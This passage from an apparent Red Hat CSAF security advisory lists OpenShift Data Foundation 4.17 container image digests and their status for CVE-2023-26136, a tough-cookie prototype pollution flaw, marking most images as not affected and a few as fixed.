RHEL 9", product_id: "9Base-RHODF-4.17:odf4/rook-ceph-rhel9-operator@sha256:b89943771e55457bd3765efd5f3e6e6697953ee9e5c7bd123921a274b79536d3_ppc64le", }, product_reference: "odf4/rook-ceph-rhel9-operator@sha256:b89943771e55457bd3765efd5f3e6e6697953ee9e5c7bd123921a274b79536d3_ppc64le", relates_to_product_reference: "9Base-RHODF-4.17", }, { category: "default_component_of", full_product_name: { name: "odf4/rook-ceph-rhel9-operator@sha256:cf89aaa1ad0614707748c0ab0b26ee40855053b0f4932cd5edaa8ccf8b1470e7_s390x as a component of RHODF 4.17 for RHEL 9", product_id: "9Base-RHODF-4.17:odf4/rook-ceph-rhel9-operator@sha256:cf89aaa1ad0614707748c0ab0b26ee40855053b0f4932cd5edaa8ccf8b1470e7_s390x", }, product_reference: "odf4/rook-ceph-rhel9-operator@sha256:cf89aaa1ad0614707748c0ab0b26ee40855053b0f4932cd5edaa8ccf8b1470e7_s390x", relates_to_product_reference: "9Base-RHODF-4.17", }, ], }, vulnerabilities: [ { acknowledgments: [ { names: [ "Kokorin Vsevolod", ], }, ], cve: "CVE-2023-26136", cwe: { id: "CWE-1321", name: "Improperly Controlled Modification of Object Prototype Attributes ('Prototype Pollution')", }, discovery_date: "2023-07-03T00:00:00+00:00", flags: [ { label: "vulnerable_code_not_present", product_ids: [ "9Base-RHODF-4.17:odf4/cephcsi-operator-bundle@sha256:2b9e511b21d4fefe8450f014962f2450db3e64af07f5e6e4bbfdaafafdfdc1f4_ppc64le", "9Base-RHODF-4.17:odf4/cephcsi-operator-bundle@sha256:9a822fddffde8f67711c5025a89e003341011e0b8145cfd5b840849cabbe68a0_amd64", "9Base-RHODF-4.17:odf4/cephcsi-operator-bundle@sha256:e35426de9ea6419f4981d8c6861867fc3eadcde4e41757b9a8f1ed4f2fa00dc9_s390x", "9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:78656a47235af49c9a7bc75d9729987edf39a77077a3f478f5b46658df18878a_amd64", "9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:92544e943e160d8fce1a9710a9d67ca4ccb795ff846edf7717d1e52835899202_ppc64le", "9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:9615793800efca765c5ae588e0547e4e18bdfe264c8a92303fbbc39276c74580_s390x", "9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:d6e30344ec1d541b6791b0e58cb48f4f3f492069ff8392005e8d1f16350c80e2_arm64", "9Base-RHODF-4.17:odf4/cephcsi-rhel9@sha256:7bc24afafec3a0896c887d7eeeca47eb6f0cb12e35c62aa212ce55210cb1512d_amd64", "9Base-RHODF-4.17:odf4/cephcsi-rhel9@sha256:93b238c24a3623bd635e162caa9a30ad7158db25eb83b545e9b365db0f769161_ppc64le", "9Base-RHODF-4.17:odf4/cephcsi-rhel9@sha256:fb6507b95b53b19d90b82c3ac2a3b0264ebbdb9d4a8ceff3006e8a446a1cef49_s390x", "9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:22b568f083c7563ffbb8d23807837a0f78cedeb156cffe9110906f3b6e0c70fb_arm64", "9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:50f66564131a5b2b695582956c80515d7eea64d1c009479665937c97a76e2348_ppc64le", "9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:a27c28ecf714cc248323a35eb58daec2aa611a318f0e61eb0defe0eaa80eb2f4_amd64", "9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:bee14d945af0620ad1666e67be750324a1814cbf573256c1c88521e18f9877f7_s390x", "9Base-RHODF-4.17:odf4/mcg-operator-bundle@sha256:71b79ea2f0356740a0e53e89a0422f8da608dd43337dd07dfcbadc9f9d8a8884_amd64", "9Base-RHODF-4.17:odf4/mcg-operator-bundle@sha256:729fdaad48dfca53af4b3bf9bbf3cbf9dd25d5c50ddcbac03d0e8738aeb997cc_s390x", "9Base-RHODF-4.17:odf4/mcg-operator-bundle@sha256:ed0d44fd0215cd299b4929617fa1f05ea31c6ee3cc078fbf6cc884e02a59beee_ppc64le", "9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:1d189e8c4dfcc998d5887e1c5f06e874fa0beed29bc8f87f279299d58124a505_arm64", "9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:5f92812a17a6637280387a3033865d8bd13ee8d6506f8e17489cefb79c53f58e_amd64", "9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:7eba9da5ba5071b411bc99d33eee04e3f4530516ad984524920de542629e9b55_ppc64le", "9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:f8c6007e32c54ffe0597952ae6eb1d38435188d605f3995ec785dff43da4257d_s390x", "9Base-RHODF-4.17:odf4/ocs-client-console-rhel9@sha256:824823d527bdbbdd2abb773e054c12b41243e15467ada76689af4fdd6fae894a_s390x", "9Base-RHODF-4.17:odf4/ocs-client-console-rhel9@sha256:9521eae22f7669dea4b31841d7cfe11e5d92155b11785afb2977cea9c5d917dc_ppc64le", "9Base-RHODF-4.17:odf4/ocs-client-console-rhel9@sha256:a94961fd2c5aea06922c9c365c3a6296abf073e09a520f190a45f687cabc7b1d_amd64", "9Base-RHODF-4.17:odf4/ocs-client-operator-bundle@sha256:26503c487a93ad520e1953ccad9200be808bc93648db90eaba3a73a340483541_ppc64le", "9Base-RHODF-4.17:odf4/ocs-client-operator-bundle@sha256:78f3e869e50bd0e69d8e6efc6e6de357aadcc06ac3659d6ec7a053cda11be88b_amd64", "9Base-RHODF-4.17:odf4/ocs-client-operator-bundle@sha256:fb473ae152002d124ff662e94ca9bf68f8f6a4c61c40d4f2929a55ef1c25cd20_s390x", "9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:0bb022ca33965fb0f9de7df36f15377a33c90d873050dcbd763370ac1f06295a_s390x", "9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:1070f8191e3ead7781876ed4d84ac5c5eeb54a1fa4d2c40701ebf393d345111c_ppc64le", "9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:8dbdc5fb2b8d4551e5896f65654b3dae8a5164c12b1e1ec6d7fdda348a7b8c7d_arm64", "9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:e7afe93fc1d88c385edc3d8ab3173e7bfb4a4f890d371836d5d2f72a2eb4abb5_amd64", "9Base-RHODF-4.17:odf4/ocs-metrics-exporter-rhel9@sha256:147c2497071460ba266fc5ef0768d82edb6be9d7ffaa0c514e49308cf8017e7a_ppc64le", "9Base-RHODF-4.17:odf4/ocs-metrics-exporter-rhel9@sha256:28fd2ef06dbf379ad4204877a3492933a731f2bc1d6dd7fc1600f52a3dc3ca47_amd64", "9Base-RHODF-4.17:odf4/ocs-metrics-exporter-rhel9@sha256:6616912ec376e6993346b38bf637eb47d7a00aa9f58120899470c8353be02a0e_s390x", "9Base-RHODF-4.17:odf4/ocs-operator-bundle@sha256:60f6533b7262bbfad59c5e14dff71878d3ea501c3b46194155ce53bc43a119e4_amd64", "9Base-RHODF-4.17:odf4/ocs-operator-bundle@sha256:664c467321c9a5c3fec9d4fd85e16ab50677684b480cd1f346638f794ee7357c_s390x", "9Base-RHODF-4.17:odf4/ocs-operator-bundle@sha256:b14752e1e9e6b004429f3c36dbaf4ec4d36d22ab9ac84c2d5158e8fbdfb214dd_ppc64le", "9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:3472c7c043b318c2569e8a900527b13d052f1860082dba13723514795cedeec0_ppc64le", "9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:54828ef99fc8d8fa3801c2ea0338a56f382018e4ae1a800dcd328fe43f7149be_arm64", "9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:54a164ce15d25597fa3939709acbe467f728ce4f4165771a685fc507edfb92a3_s390x", "9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:cfa36a55dc542e3e1332a55a59588a753f80e32d905847e51efdd1478fd58f0b_amd64", "9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:0e2a71ed4eaa44f786428e18e01d90d3b0384169c78c5654e2ebbaac3a5ee2a4_ppc64le", "9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:8046b84915034f60a5e5e349b001f04b713b3aa71ced136390c5086e0c351dd4_amd64", "9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:9cbf21dad9ed5738ae1feb112707af3e74e02784795addf07ee4228bbd22e932_s390x", "9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:a42d48b82e34f1f7cb731c3bdd25e81dc5ff3a61a3ca0b8b5eecefb5e2218be0_arm64", "9Base-RHODF-4.17:odf4/odf-console-rhel9@sha256:89cc7f0d6adb957e0f3adbdb2c023d4a6dda89e388a94d0b4015e0853971075e_ppc64le", "9Base-RHODF-4.17:odf4/odf-console-rhel9@sha256:917e625bfea670e543f857cf7cea31380b76ceac862bee61cc490cebabd23081_amd64", "9Base-RHODF-4.17:odf4/odf-console-rhel9@sha256:b1ba270980579090845909bb4f1e8a7b98ce8816c7c5ea60903432d138d29310_s390x", "9Base-RHODF-4.17:odf4/odf-cosi-sidecar-rhel9@sha256:2be1d5ad630b9e91f30e0c82cfee52231d095cee87908949170e40a39f4ed814_ppc64le", "9Base-RHODF-4.17:odf4/odf-cosi-sidecar-rhel9@sha256:37ec39720b1ce9701630635f158ad20414b1cda335b15b11526a7838ed189a54_s390x", "9Base-RHODF-4.17:odf4/odf-cosi-sidecar-rhel9@sha256:7c59771279f5227246a941925160ca2f9fc169bd13972ab68a476e62308707e1_amd64", "9Base-RHODF-4.17:odf4/odf-csi-addons-operator-bundle@sha256:328ddae72c795012c7671c214d9a84d539264f8fe855d1a9e2dbb74590e72076_s390x", "9Base-RHODF-4.17:odf4/odf-csi-addons-operator-bundle@sha256:99d8b3aedcc57f57716bba144b991f7f223cdcc47ec37903c85aa20df295b3d4_amd64", "9Base-RHODF-4.17:odf4/odf-csi-addons-operator-bundle@sha256:f3f28074884a29b5d28f4535af6489f1ca8326dd60689c4bc8c862277dcb6e22_ppc64le", "9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:12e2b71cea2c63fb14363334287f5affa4ff3dc84f24dd51b5f57ba6a751c2da_amd64", "9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:7fa969e6714e0c3851f30999df5c823cd5738f28e1b2f6c06d940541c6edad4e_s390x", "9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:a0ac08a8a3ee9155338182d47bf55595a78aec3811c70f3fedb2ed461aad3319_arm64", "9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:b96b09407708601d04abb6a90d16f6f1260839534d64238b6aa4c7a5f458a6a4_ppc64le", "9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:02e65965166ec9794f11b663de59671f159f8b2fef4d56ee5589b26bef342168_s390x", "9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:322bae96941ede565a681ad98fc287f442f36888e0ed2b5ec4b309c702c7488b_amd64", "9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:6e44cf5a814ceb7fea6ef925f6381a279837ebe2baf2980f4937e0c752afa5e2_arm64", "9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:7a206b9fe0e540674fc9ec97b338607e61b8bfd3bfe30855835d0a940ca9304c_ppc64le", "9Base-RHODF-4.17:odf4/odf-multicluster-operator-bundle@sha256:883ba750931a93d30ff1dd3ed78592940a0079640da3d79400261f43fbecb69f_s390x", "9Base-RHODF-4.17:odf4/odf-multicluster-operator-bundle@sha256:baf554d45b1fb4b38b264145809c10c7733120104bc4d8bd9e1ecb0c428db382_ppc64le", "9Base-RHODF-4.17:odf4/odf-multicluster-operator-bundle@sha256:c05b5597918214f845c7243b7407b6cc3c88f644eec504585bd411727376b898_amd64", "9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:0810e85e929ad83a8593eab74a312b9c49ec94ea9833a37b7f06bca87ca9647b_ppc64le", "9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:54cec6c71192cc9cb6c2bbcd812a5dcccd4905d5d7e822b4012622bb235fe75c_arm64", "9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:66de77eb933a0fb4e0d98d2c1326212d494f6c3aa2e235f27f2a641fb31ff4af_s390x", "9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:941371cee3ee7dd127d5663b7e1bcb39c6565031c11fb508f07c40f37aaee4d1_amd64", "9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:6978d438b80f8fd7572c792155c2f86cc6fa55ff0b8cb1d45bbe04e42d185fe3_ppc64le", "9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:7c09fb5c685be2a3029d02a35417e681f3b034269d1ac3014c1c5cdd2e035e61_s390x", "9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:8ccd7099f174842dab551c27a55d822cfb12d8ba26c3528f605697cbfbbf8e70_amd64", "9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:d0a1a2f77001e06cdb650b857433d6eebeb53eb5337354c8a042003db80387db_arm64", "9Base-RHODF-4.17:odf4/odf-operator-bundle@sha256:01d80d9fc9cbc3f3fecab4716bde805ad97b1fbcd4942ecbb07eab9fb4714012_s390x", "9Base-RHODF-4.17:odf4/odf-operator-bundle@sha256:6e3b814a41abf41ec9cdb5d71aafc79a086fc37f2986a3fd74f75341a4af91a2_amd64", "9Base-RHODF-4.17:odf4/odf-operator-bundle@sha256:f8e5b7818849a95ca57347496baa35507ce634c645643303205309f55572db7d_ppc64le", "9Base-RHODF-4.17:odf4/odf-prometheus-operator-bundle@sha256:0d5aa39387a341a497a0cbc8d18c0e1e050e118b08243f5d8395ffe7394cc5f1_amd64", "9Base-RHODF-4.17:odf4/odf-prometheus-operator-bundle@sha256:26541764bf0b79a4cc87600d1a1981a247d7678f9a8c37af62e80f22213159a7_s390x", "9Base-RHODF-4.17:odf4/odf-prometheus-operator-bundle@sha256:75a85b98bcfa527709b8b1f16694a8bf68d5ea84a66b73baf5fea927df6e2904_ppc64le", "9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:37af72217b81a8a7b0d968ec09a396f1840155f2a472eaa68927281f080d137f_amd64", "9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:70ff7d9b8f6fb97fbe72768ed97519cd9e2b60dedbe1133d17fd0e317079ab3f_ppc64le", "9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:9d7f8b892351de60609c30d187c5547ba4bec3be2dadd0e6d8ded2c4f3c1e79e_s390x", "9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:f94cd1be8e371e8c85062be3e4475157cb628d339c1716bf96167e02703edf97_arm64", "9Base-RHODF-4.17:odf4/odr-cluster-operator-bundle@sha256:1b641a6aa2c4b1bc79ab0188c56f533fd89459be71b2b34f794faebaa66fd1f5_s390x", "9Base-RHODF-4.17:odf4/odr-cluster-operator-bundle@sha256:1e2ebbe9f71a03bfc6a0bd90f786293d9eec473ba2d570c8662a7f8d03dcc1b4_ppc64le", "9Base-RHODF-4.17:odf4/odr-cluster-operator-bundle@sha256:40d75cfa1eb657512dc4da888a5bb793a3ef3d6726665bc9ad7009cdd4166a1f_amd64", "9Base-RHODF-4.17:odf4/odr-hub-operator-bundle@sha256:22c88c1f6be208bc0a5f0053f99ea728b9e457e150b4236a04304810270f1f80_ppc64le", "9Base-RHODF-4.17:odf4/odr-hub-operator-bundle@sha256:50d04e71ae52f1a246d1509c5f2abbcb2f2bb2209090526b3357b8012b4b67d5_s390x", "9Base-RHODF-4.17:odf4/odr-hub-operator-bundle@sha256:d7e8549c1a5cabd7324c589eadf9ccebccc1abbfb69d47826baaeaebc283c6a3_amd64", "9Base-RHODF-4.17:odf4/odr-recipe-operator-bundle@sha256:0223d74679590c8a5fbd34f3d793c05ec671ecb406b2055166bd54f09f75bbda_amd64", "9Base-RHODF-4.17:odf4/odr-recipe-operator-bundle@sha256:137a8a07adae2c0bb5fd1ac2a5823ffd85abe1035512a04e112e55b0aa3dc163_ppc64le", "9Base-RHODF-4.17:odf4/odr-recipe-operator-bundle@sha256:987ed8aa1347a831f61a4d65011f5bd00a700c65f6e7fa669ff3f38131425705_s390x", "9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:2f414dc954bca2cd17f0bbabea11a8f18437eb417c6266d8c4750ba96957fc87_amd64", "9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:bf140f64657478a7f94bacd6784f7b7727d5df9ae8eb4c526f86d5533bff06ae_arm64", "9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:d9c38fe43617f214fea848ef7124d77f30358e2049390fc3bd3526986ff9ebbb_s390x", "9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:fc251ea3c441bd0d3e358969fb6730bb9e53e340da9eff8bb6a173a37116c943_ppc64le", "9Base-RHODF-4.17:odf4/rook-ceph-operator-bundle@sha256:1055afb10a6ce469d2c77337878f510b29375a830f14505042da8a6d6081c438_amd64", "9Base-RHODF-4.17:odf4/rook-ceph-operator-bundle@sha256:5df96c3b3dc8cdad2c8b42fd9378dc55779cdb11f64eea5fa653101505d4d497_s390x", "9Base-RHODF-4.17:odf4/rook-ceph-operator-bundle@sha256:7cb791603d9d7c8c1c8e5200f96401ad0fadc5db14ad698e7a9519d046d0fdd0_ppc64le", "9Base-RHODF-4.17:odf4/rook-ceph-rhel9-operator@sha256:7488149277a76efe188086d283fa2acf732a4eca8bdeaa4de8744204876a77a2_amd64", "9Base-RHODF-4.17:odf4/rook-ceph-rhel9-operator@sha256:b89943771e55457bd3765efd5f3e6e6697953ee9e5c7bd123921a274b79536d3_ppc64le", "9Base-RHODF-4.17:odf4/rook-ceph-rhel9-operator@sha256:cf89aaa1ad0614707748c0ab0b26ee40855053b0f4932cd5edaa8ccf8b1470e7_s390x", ], }, ], ids: [ { system_name: "Red Hat Bugzilla ID", text: "2219310", }, ], notes: [ { category: "description", text: "A flaw was found in the tough-cookie package which allows Prototype Pollution due to improper handling of Cookies when using CookieJar in rejectPublicSuffixes=false mode. This issue arises from the manner in which the objects are initialized.", title: "Vulnerability description", }, { category: "summary", text: "tough-cookie: prototype pollution in cookie memstore", title: "Vulnerability summary", }, { category: "general", text: "The CVSS score(s) listed for this vulnerability do not reflect the associated product's status, and are included for informational purposes to better understand the severity of this vulnerability.", title: "CVSS score applicability", }, ], product_status: { fixed: [ "9Base-RHODF-4.17:odf4/odf-multicluster-console-rhel9@sha256:25052271f038b691ef973ac5a9fc02eee015a0427e087a5a390f1e31f7823d79_ppc64le", "9Base-RHODF-4.17:odf4/odf-multicluster-console-rhel9@sha256:3342a17a1afca419dbfbff815261e91cdf8dcf0eecaf5a25a1713a39f3f95bf4_amd64", "9Base-RHODF-4.17:odf4/odf-multicluster-console-rhel9@sha256:df597ffd1b0d14d394e39b1d92fc90797bea5386a390450193d99f7db5bc377c_s390x", ], known_not_affected: [ "9Base-RHODF-4.17:odf4/cephcsi-operator-bundle@sha256:2b9e511b21d4fefe8450f014962f2450db3e64af07f5e6e4bbfdaafafdfdc1f4_ppc64le", "9Base-RHODF-4.17:odf4/cephcsi-operator-bundle@sha256:9a822fddffde8f67711c5025a89e003341011e0b8145cfd5b840849cabbe68a0_amd64", "9Base-RHODF-4.17:odf4/cephcsi-operator-bundle@sha256:e35426de9ea6419f4981d8c6861867fc3eadcde4e41757b9a8f1ed4f2fa00dc9_s390x", "9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:78656a47235af49c9a7bc75d9729987edf39a77077a3f478f5b46658df18878a_amd64", "9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:92544e943e160d8fce1a9710a9d67ca4ccb795ff846edf7717d1e52835899202_ppc64le", "9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:9615793800efca765c5ae588e0547e4e18bdfe264c8a92303fbbc39276c74580_s390x", "9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:d6e30344ec1d541b6791b0e58cb48f4f3f492069ff8392005e8d1f16350c80e2_arm64", "9Base-RHODF-4.17:odf4/cephcsi-rhel9@sha256:7bc24afafec3a0896c887d7eeeca47eb6f0cb12e35c62aa212ce55210cb1512d_amd64", "9Base-RHODF-4.17:odf4/cephcsi-rhel9@sha256:93b238c24a3623bd635e162caa9a30ad7158db25eb83b545e9b365db0f769161_ppc64le", "9Base-RHODF-4.17:odf4/cephcsi-rhel9@sha256:fb6507b95b53b19d90b82c3ac2a3b0264ebbdb9d4a8ceff3006e8a446a1cef49_s390x", "9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:22b568f083c7563ffbb8d23807837a0f78cedeb156cffe9110906f3b6e0c70fb_arm64", "9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:50f66564131a5b2b695582956c80515d7eea64d1c009479665937c97a76e2348_ppc64le", "9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:a27c28ecf714cc248323a35eb58daec2aa611a318f0e61eb0defe0eaa80eb2f4_amd64", "9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:bee14d945af0620ad1666e67be750324a1814cbf573256c1c88521e18f9877f7_s390x", "9Base-RHODF-4.17:odf4/mcg-operator-bundle@sha256:71b79ea2f0356740a0e53e89a0422f8da608dd43337dd07dfcbadc9f9d8a8884_amd64", "9Base-RHODF-4.17:odf4/mcg-operator-bundle@sha256:729fdaad48dfca53af4b3bf9bbf3cbf9dd25d5c50ddcbac03d0e8738aeb997cc_s390x", "9Base-RHODF-4.17:odf4/mcg-operator-bundle@sha256:ed0d44fd0215cd299b4929617fa1f05ea31c6ee3cc078fbf6cc884e02a59beee_ppc64le", "9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:1d189e8c4dfcc998d5887e1c5f06e874fa0beed29bc8f87f279299d58124a505_arm64", "9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:5f92812a17a6637280387a3033865d8bd13ee8d6506f8e17489cefb79c53f58e_amd64", "9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:7eba9da5ba5071b411bc99d33eee04e3f4530516ad984524920de542629e9b55_ppc64le", "9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:f8c6007e32c54ffe0597952ae6eb1d38435188d605f3995ec785dff43da4257d_s390x", "9Base-RHODF-4.17:odf4/ocs-client-console-rhel9@sha256:824823d527bdbbdd2abb773e054c12b41243e15467ada76689af4fdd6fae894a_s390x", "9Base-RHODF-4.17:odf4/ocs-client-console-rhel9@sha256:9521eae22f7669dea4b31841d7cfe11e5d92155b11785afb2977cea9c5d917dc_ppc64le", "9Base-RHODF-4.17:odf4/ocs-client-console-rhel9@sha256:a94961fd2c5aea06922c9c365c3a6296abf073e09a520f190a45f687cabc7b1d_amd64", "9Base-RHODF-4.17:odf4/ocs-client-operator-bundle@sha256:26503c487a93ad520e1953ccad9200be808bc93648db90eaba3a73a340483541_ppc64le", "9Base-RHODF-4.17:odf4/ocs-client-operator-bundle@sha256:78f3e869e50bd0e69d8e6efc6e6de357aadcc06ac3659d6ec7a053cda11be88b_amd64", "9Base-RHODF-4.17:odf4/ocs-client-operator-bundle@sha256:fb473ae152002d124ff662e94ca9bf68f8f6a4c61c40d4f2929a55ef1c25cd20_s390x", "9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:0bb022ca33965fb0f9de7df36f15377a33c90d873050dcbd763370ac1f06295a_s390x", "9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:1070f8191e3ead7781876ed4d84ac5c5eeb54a1fa4d2c40701ebf393d345111c_ppc64le", "9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:8dbdc5fb2b8d4551e5896f65654b3dae8a5164c12b1e1ec6d7fdda348a7b8c7d_arm64", "9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:e7afe93fc1d88c385edc3d8ab3173e7bfb4a4f890d371836d5d2f72a2eb4abb5_amd64", "9Base-RHODF-4.17:odf4/ocs-metrics-exporter-rhel9@sha256:147c2497071460ba266fc5ef0768d82edb6be9d7ffaa0c514e49308cf8017e7a_ppc64le", "9Base-RHODF-4.17:odf4/ocs-metrics-exporter-rhel9@sha256:28fd2ef06dbf379ad4204877a3492933a731f2bc1d6dd7fc1600f52a3dc3ca47_amd64", "9Base-RHODF-4.17:odf4/ocs-metrics-exporter-rhel9@sha256:6616912ec376e6993346b38bf637eb47d7a00aa9f58120899470c8353be02a0e_s390x", "9Base-RHODF-4.17:odf4/ocs-operator-bundle@sha256:60f6533b7262bbfad59c5e14dff71878d3ea501c3b46194155ce53bc43a119e4_amd64", "9Base-RHODF-4.17:odf4/ocs-operator-bundle@sha256:664c467321c9a5c3fec9d4fd85e16ab50677684b480cd1f346638f794ee7357c_s390x", "9Base-RHODF-4.17:odf4/ocs-operator-bundle@sha256:b14752e1e9e6b004429f3c36dbaf4ec4d36d22ab9ac84c2d5158e8fbdfb214dd_ppc64le", "9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:3472c7c043b318c2569e8a900527b13d052f1860082dba13723514795cedeec0_ppc64le", "9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:54828ef99fc8d8fa3801c2ea0338a56f382018e4ae1a800dcd328fe43f7149be_arm64", "9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:54a164ce15d25597fa3939709acbe467f728ce4f4165771a685fc507edfb92a3_s390x", "9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:cfa36a55dc542e3e1332a55a59588a753f80e32d905847e51efdd1478fd58f0b_amd64", "9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:0e2a71ed4eaa44f786428e18e01d90d3b0384169c78c5654e2ebbaac3a5ee2a4_ppc64le", "9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:8046b84915034f60a5e5e349b001f04b713b3aa71ced136390c5086e0c351dd4_amd64", "9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:9cbf21dad9ed5738ae1feb112707af3e74e02784795addf07ee4228bbd22e932_s390x", "9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:a42d48b82e34f1f7cb731c3bdd25e81dc5ff3a61a3ca0b8b5eecefb5e2218be0_arm64", "9Base-RHODF-4.17:odf4/odf-console-rhel9@sha256:89cc7f0d6adb957e0f3adbdb2c023d4a6dda89e388a94d0b4015e0853971075e_ppc64le", "9Base-RHODF-4.17:odf4/odf-console-rhel9@sha256:917e625bfea670e543f857cf7cea31380b76ceac862bee61cc490cebabd23081_amd64", "9Base-RHODF-4.17:odf4/odf-console-rhel9@sha256:b1ba270980579090845909bb4f1e8a7b98ce8816c7c5ea60903432d138d29310_s390x", "9Base-RHODF-4.17:odf4/odf-cosi-sidecar-rhel9@sha256:2be1d5ad630b9e91f30e0c82cfee52231d095cee87908949170e40a39f4ed814_ppc64le", "9Base-RHODF-4.17:odf4/odf-cosi-sidecar-rhel9@sha256:37ec39720b1ce9701630635f158ad20414b1cda335b15b11526a7838ed189a54_s390x", "9Base-RHODF-4.17:odf4/odf-cosi-sidecar-rhel9@sha256:7c59771279f5227246a941925160ca2f9fc169bd13972ab68a476e62308707e1_amd64", "9Base-RHODF-4.17:odf4/odf-csi-addons-operator-bundle@sha256:328ddae72c795012c7671c214d9a84d539264f8fe855d1a9e2dbb74590e72076_s390x", "9Base-RHODF-4.17:odf4/odf-csi-addons-operator-bundle@sha256:99d8b3aedcc57f57716bba144b991f7f223cdcc47ec37903c85aa20df295b3d4_amd64", "9Base-RHODF-4.17:odf4/odf-csi-addons-operator-bundle@sha256:f3f28074884a29b5d28f4535af6489f1ca8326dd60689c4bc8c862277dcb6e22_ppc64le", "9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:12e2b71cea2c63fb14363334287f5affa4ff3dc84f24dd51b5f57ba6a751c2da_amd64", "9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:7fa969e6714e0c3851f30999df5c823cd5738f28e1b2f6c06d940541c6edad4e_s390x", "9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:a0ac08a8a3ee9155338182d47bf55595a78aec3811c70f3fedb2ed461aad3319_arm64", "9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:b96b09407708601d04abb6a90d16f6f1260839534d64238b6aa4c7a5f458a6a4_ppc64le", "9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:02e65965166ec9794f11b663de59671f159f8b2fef4d56ee5589b26bef342168_s390x", "9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:322bae96941ede565a681ad98fc287f442f36888e0ed2b5ec4b309c702c7488b_amd64", "9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:6e44cf5a814ceb7fea6ef925f6381a279837ebe2baf2980f4937e0c752afa5e2_arm64", "9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:7a206b9fe0e540674fc9ec97b338607e61b8bfd3bfe30855835d0a940ca9304c_ppc64le", "9Base-RHODF-4.17:odf4/odf-multicluster-operator-bundle@sha256:883ba750931a93d30ff1dd3ed78592940a0079640da3d79400261f43fbecb69f_s390x", "9Base-RHODF-4.17:odf4/odf-multicluster-operator-bundle@sha256:baf554d45b1fb4b38b264145809c10c7733120104bc4d8bd9e1ecb0c428db382_ppc64le", 